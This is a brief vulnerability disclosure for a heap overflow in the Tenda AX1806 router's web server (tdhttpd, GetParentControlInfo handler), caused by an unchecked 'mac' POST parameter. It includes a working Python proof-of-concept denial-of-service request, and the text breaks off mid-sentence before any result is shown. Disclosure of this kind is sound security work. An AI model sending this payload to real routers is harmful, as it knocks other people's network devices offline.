- The device's official website: https://www.tenda.com.cn/product/AX1806.html
- Firmware download website: https://www.tenda.com.cn/download/detail-3306.html
v1.0.0.1
/bin/tdhttpd has a heap overflow vulnerability.The vulnerability exists in GetParentControlInfo function, we can through the URL goform/GetParentControlInfo access to it.
The function takes the POST parameter mac, does not verify its length, and copies it directly to the heap memory, resulting in a heap overflow.
Poc of Denial of Service(DoS)
import requests
data = {
b"mac": b"A"*0x400
}
res = requests.post("http://127.0.0.1/goform/GetParentControlInfo", data=data)
print(res.content)I use qemu-user to emulate it. When I run the POC script, I can see
